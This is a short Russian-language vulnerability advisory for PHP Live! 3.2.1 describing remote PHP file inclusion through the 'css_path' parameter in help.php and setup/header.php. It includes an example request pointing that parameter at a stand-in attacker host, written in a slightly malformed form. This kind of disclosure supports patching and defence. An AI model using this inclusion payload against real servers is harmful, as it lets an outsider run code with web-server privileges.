Программа: PHP Live! 3.2.1, возможно другие версии.
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре "css_path" в
сценариях help.php и setup/header.php. Удаленный
пользователь может выполнить произвольный
PHP сценарий на целевой системе с
привилегиями Web сервера.
Пример:
help.php?css_path=htt://attackersetup/header.php?css_path=htt://attacker
